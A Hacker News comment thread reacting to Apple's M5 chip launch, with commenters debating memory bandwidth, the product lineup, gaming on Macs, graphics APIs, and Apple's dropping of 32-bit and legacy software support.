"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt."

mgaunard 15 hours ago

why is Apple focusing on AI? do they have any AI products like Google, Meta or OpenAI?

warrenmiller 12 hours ago

why only on the 14'' not the 16'' ?

busymom0 17 hours ago

> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

  • supernes 16 hours ago

    They'll put it in the Mini when they push out a new Studio to upsell to.

apatheticonion 13 hours ago

Wake me up when I can play video games on my MacBook and I'll upgrade my MacBook M1 Pro.

Until then, I take a mini PC with me along with my M1 when I travel and use game streaming for gaming and offload dev and AI work via ssh + ssh remote tools.

To me, M5 has amazing hardware, but they put square wheels on a Ferrari

davidw 19 hours ago

Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?

kotaKat 20 hours ago

Surprised they aren’t beating the “performance per watt” drum they normally would be on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap on the line for M1 and M2, tie up loose ends with Walmart for the $599 M1 Air they still make for ‘em, and start shipping out the A18 Pro-based Macbooks in November.

  • ajross 15 hours ago

    They don't have a new process to launch on, so one wouldn't expect a power metric to improve at all.

exabrial 20 hours ago

Apple's software division has lost their way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32bit has been awhile now, but alas), meanwhile retreating on stability.

Snow Leopard still remains the company's crown achievement. 0 bloatware, 0 "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

  • morshu9001 14 hours ago

    I liked Snow Leopard too, it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah I don't touch any of the new features.

  • badc0ffee 17 hours ago

    I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.

    • morshu9001 12 hours ago

      They tried to make you use the App Store for Xcode and system updates, but thankfully there have been solid workarounds

  • raw_anon_1111 19 hours ago

    They completely removed hardware support for 32 bit software.

    • morshu9001 14 hours ago

      This was in the Intel generation of Macs. If Windows can support 32-bit software then so should Mac, along with all that 64-bit software that got broken in random Mac updates.

      Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

      • raw_anon_1111 14 hours ago

        Do you think they didn’t know they were moving away from Intel when they did that? Besides code is shared between MacOS and iOS even then. They removed 32 bit support from ARM processors years before they moved to ARM based Macs.

        • morshu9001 14 hours ago

          They probably did, but just because M1 gets released doesn't mean Intel Macs suddenly don't have 32-bit capable hardware. I get why it was easier to drop it in the new OS regardless of hardware, only it throws a lot of software under the bus, and running software is kinda the OS's main job.

          And the hardware isn't a showstopper anyway. Apple did x86-64 on AS, Windows' WoW64 does x86-32 on ARM-32 or even IA-64, and I'll bet Windows will do x86-32 on x86-64 if Intel ever drops the 32 mode. Wine 32on64 will run x86-32 on AS already.

          • raw_anon_1111 14 hours ago

            And Windows is also a bloated mess that they couldn’t use on mobile and their ARM initiatives have gone nowhere.

            If you don’t think Windows is a bloated mess, look up all of the different ways you have to represent a “string” depending on the API you are calling.

            • morshu9001 13 hours ago

              Sure but those are unrelated. Microsoft doesn't make the chips, and Windows crapiness is its own thing. It not like macOS would turn to crap if they made Rosetta2 support x86-32, or in general stopped breaking all the 3P software.

              • raw_anon_1111 13 hours ago

                Windows crapiness is because they won’t deprecate anything ever. Read some of Raymond Chen’s posts about all of the special casing they did for apps that broke on newer versions of Windows because app developers were using unpublished APIs.

                Every bit of backwards compatibility increases the testing surface and the vulnerabilities. In fact, an early bug in Windows NT that you could encode DOS shell commands in the browser URL bar from a client and they wouod run with admin privileges if the server was running IIS.

                Should Apple have also kept 68K emulation around? PPC?

                • morshu9001 13 hours ago

                  Apple went the other extreme. Even if you use public APIs exactly the way they want, your software will break frequently. This is without even getting into the whole OpenGL vs Metal drama.

                  In Windows they took things a bit too far by not only supporting old stuff but also treating it as first-class. If software is too outdated, it's fair to stick it behind some compat layer that makes it slower, as long as it still runs. But that's not even the biggest problem with Windows, it's Microsoft turning it into adware, also not being Unixlike in the first place.

                  To answer your last question, yes for PPC at least. 68K is too old to matter. Emulation layer doesn't need to hold back the entire system. If it means less dev resources to spend making glass effects and emojis, fine.

                  • raw_anon_1111 8 hours ago

                    It does hold back the entire system though. It increases the attack surface of vulnerabilities and it allows companies like Adobe and Microsoft to be lazy about updating their software.

                • bigyabai 11 hours ago

                  > Should Apple have also kept 68K emulation around? PPC?

                  Yes? What kind of mercurial clown world do you live in, where you pay for software and then cheer when it's yoinked off your computer in an OTA update?

                  Even Windows users aren't whipped enough to lick their OEM's boot like that, Jesus. You'd hope Mac users would still have a spine; Apple doesn't maintain macOS as a charity, you're allowed to disagree with them.

                  • raw_anon_1111 10 hours ago

                    I don’t believe you are serious that you don’t see the issue with MacOS having

                    - A 68K emulator

                    - A PPC emulator

                    - a 32 bit x86 emulator

                    - a 32 bit ARM emulator (since ARM chips don’t have hardware to run 32 bit code)

                    And to think that Windows is a shining example of good operating system design.

                    Why not include a 65C02 emulator also so you can run AppleWorks 3.0 from 1986?

                    • morshu9001 7 hours ago

                      Maybe I'm mistaken but I thought generic ARM (not AS) had a 32 mode, and in fact that's what Windows emulates x86-32 into. If not then great, x86-32 on ARM64.

                    • bigyabai 8 hours ago

                      I don't believe you know what you're talking about, if you think that Apple's 64-bit ARM chips struggle to run 32-bit code in-userland. Especially if you're going to put words in my mouth - at no point did I ever call the Windows OS a shining example of anything. You're confirming my suspicion that you live in a mercurial clown dimension.

                      However, I will absolutely say Windows users have higher expectations from Microsoft than what Mac customers demand from Apple. Macs would get removed by force from many of the places that rely on Windows in professional settings like render farms, factory automation, and defense. There is absolutely zero tolerance for Apple's shenanigans there, and Apple offers those customers no products to take their needs seriously, unlike Microsoft. It's not a coincidence that Apple has zero buy-in outside the consumer market, not a single professional customer wants what Apple is selling if Nvidia or AMD will do the same thing with less-petty software support. We all know why products like XServe failed, poor Apple had too much pride to support the software that the industry had actual demand for.

                      While we're talking about software darwinism, I think you need to hear this; Darwin objectively sucks from a systems design standpoint, it's why nobody uses XNU unless they're forced to. It's empirically slow, deliberately neutered for third-parties, the user-exposed runtime is loaded with outdated/unnecessary crap and BSD tooling that won't work with industry-standard software, the IPC model is not secure (fight me), the capabilities are arbitrarily changed per-OS, filesystem security is second-rate like Windows/Bitlocker, the default install is bloated with literal gigabytes of deadweight binaries, both LLB and iBoot are mandatory NSA slopware blobs, and their SDK commitment is more fickle than developers playing Musical Chairs.

                      None of these kernels are good, but XNU is unique in that it is completely disposable to humanity and possesses no remaining valuable features. If macOS stopped working tomorrow, there would be no disruption to any critical infrastructure around the world. If Linux or Windows had a Y2K moment, we'd be measuring the deaths by the thousands. I'm willing to give Apple their due, but you refuse to admit they're lazy - "since ARM chips don't have hardware" my ass, on "hacker" news of all places...

                      • raw_anon_1111 8 hours ago

                        What’s there not to “believe”? There is no hardware support for 32 bit ARM instructions on Macs and iPhones. In fact there has never been 32 bit ARM Mac software. What software are you pining for from 32 bit x86 Macs?

                        Consider how shitty the x86 Windows experience is compared to modern Macs - poor battery life, loud, slow and hot - I’m really surprised at how little Windows users expect from their computers.

                        As far as the Arm based Windows computers, the x86 emulator is slower than Macs running x86 code and the processors are worse.

                        And are you really saying ARM based Macs, iPhones and iPads are slow?

                        You seem to want the Mac to be the equivalent of the “HomerMobile”.

                        No professional is buying Macs? You think that video and audio professionals as well as developers are really saying “we really want Windows computers” or did I miss the “Year of the Linux desktop”?

pzo 17 hours ago

This is quite weird move and confusing (probably on purpose). This chip M5 is released in Macbook PRO but previous macbook pro had M4 Pro or M4 Max so their more like macbook air series to even like ipad pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4" but my old Macbook M2 Max have 400GB/s

LarsDu88 16 hours ago

It's disappointing to me how far behind other chipmakers are in having unified gpu/cpu memory bus. Only AMD Strix Halo even attempts this. Well this announcement tipped my hand and I'm finally buying a new macbook :)

jdc0589 18 hours ago

this is cool and all, but what im really exited about is the possibility that one day they update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

sneak 14 hours ago

Cool. My maxxed out M4 Max MBP is scheduled for delivery tomorrow. Guess I’ll return it.

  • ppeetteerr 14 hours ago

    The M5 Pro/Max models are likely going to arrive in March (but maybe earlier)

    • sneak 14 hours ago

      Oh, the M5s available max out at 32GB ram, even in the MBP. That’s a nonstarter for me in a pro machine.

sidcool 19 hours ago

I wonder if they informed Jensen about it.

superkuh 19 hours ago

I know it's only shared system RAM and not VRAM, but the M5's 150GB/s isn't going to be very fast when doing AI inference. A fairly old rtx 3060 12GB does 360GB/s. But I guess quantity is a quality all of it's own when it comes to RAM and inference.

GaggiX 20 hours ago

>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

tiahura 21 hours ago

No 16”?

  • adamch 21 hours ago

    They'll announce that along with M5 Pro and Max in March or so.

tonyhart7 13 hours ago

never see the day that I would say that Apple device is one of the best to run LLM

StopDisinfo910 21 hours ago

I appreciate Apple propping up the GPU performance of their SoC but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also unleashes? Really? The marketing madness has to stop at some point.

  • dralley 19 hours ago

    Not that I've actually used any of these APIs, but supposedly Metal is the best designed Graphics API by a decent margin, it's just handicapped severely by how insular they and their ecosystem are.

    • Cloudef 4 hours ago

      > Metal is the best designed Graphics API

      API that has dependency on objective-c runtime doesn't sound very good

    • bigyabai 14 hours ago

      Depends on what you're comparing to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the Open Source alternatives, and Metal itself is a proprietary solution competing against other well-designed alternatives like DirectX and NVN.

      I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

  • mcv 20 hours ago

    Soon they'll be stomping all over your calculation problems, and then obliterating them!

thomascountz 13 hours ago

Imagine Apple released a laptop that shipped without MacOS. Just the hardware, drivers, and the integrated M-series chips.

   The MacBook Zero
jadbox 20 hours ago

... no benchmarks?

lenerdenator 20 hours ago

Now if some game companies would just port their wares to Apple Silicon and the MacOS libraries already...

jhart 16 hours ago

[dead]

jtrn 13 hours ago

No wifi 7. No 5g. No 16". No upgrade to Max ram. No upgrade to screen. No Bluetooth 6. No upgrade for me. I’ll stay with my M1 Max for now.

  • _zoltan_ 13 hours ago

    you're comparing your M1 Max with the base model M5, not M5 Max. chill. it will come.

nake13 20 hours ago

It seems this generation focuses more on GPU and AI acceleration rather than CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance compared with M4, provides 30% higher graphics performance, and offers 15% faster multithreaded CPU performance.

YouAreWRONGtoo 12 hours ago

When it allows installing any Linux with working drivers, I will consider it. Otherwise, you can go back to your garage and I will continue to make fun of people using Macs.

  • shitloadofbooks 12 hours ago

    Why do you care so much? Sounds exhausting...

ThrowawayR2 19 hours ago

A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

exabrial 20 hours ago

> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe the benchmarks, not marketing claims, but an observation and a question.

1. AMD EPYC 4585PX has ~89GB/s, with pretty good latency, as long you use 2xdimm

2. How does this compare to the memory bandwidth and latency of M1,M2,M3,M4 in reality with all of the caveats? It seems like M1 was a monumental leap forward, then everything else was a retraction.